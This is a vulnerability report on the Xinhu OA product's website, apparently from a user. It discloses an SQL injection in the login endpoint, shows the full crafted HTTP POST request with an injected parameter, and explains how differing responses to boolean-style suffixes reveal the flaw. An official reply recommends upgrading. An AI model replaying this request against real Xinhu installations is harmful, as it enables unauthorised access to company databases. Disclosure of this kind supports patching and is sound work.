信呼
为企业构建一个基于互联网的企业管理平台, 对企业中沟通与互动,协作与管理的全方位整合,并且免费开源系统,二次开发更快捷,即时推送审批,掌上APP手机办公。
联系我们
  [提问问题]
有事直接问,不要问在不在
微信联系我们 
[授权]  [演示]  在线客服
当前位置:首页 > 信息内容 > 系统存在SQL注入漏洞
系统存在SQL注入漏洞
浏览次数(339+9),最后更新(2025-09-25 16:55:51)

系统存在sql注入漏洞

测试用例:

post /index.php?a=%28select+checkscan%29&m=login&d=&ajaxbool=true&rnd=487355 http/1.1

content-length: 112

host: xxxx

connection: keep-alive

user-agent: mozilla/5.0 compatible; msie 9.0; windows nt 6.1; wow64; trident/5.0

cookie: phpsessid=b09g0ca9254emrahh62fheo9jg

accept: application/json, text/javascript, *

x-requested-with: xmlhttprequest

upgrade-insecure-requests: 1

referer: http://xxxx/?m=login

sec-fetch-dest: document

sec-fetch-site: same-origin

sec-fetch-user: ?1

accept-encoding: gzip, deflate, br

accept-language: en-us,en;q=0.9

content-type: application/x-www-form-urlencoded

sec-fetch-mode: navigate

rempass=0&jmpass=false&device=1758700919015&ltype=0&adminuser=mq%3a%3a&adminpass=revdmflqqvntv09sra%3a%3a&yanzm=

备注信息:

对比参数值后缀("+v+")和("+v+","+v+")后的服务器的返回结果,两个结果不同,建议在代码中加入对sql语句查询条件的判断。

[img,{fileurl}/img/81124.png,700]

[img,{fileurl}/img/100587.png,700]

原创文章,禁止转载复制,信呼OA官网保留一切知识产权。

  •  1楼 官网(2025-09-25 19:15:13) 
    建议升级最新
评论回复(1)
 
关注我们公众号
Copyright ©2016-2025 信呼办公OA系统 版权所有   闽ICP备18008179号-2   ↑回到顶部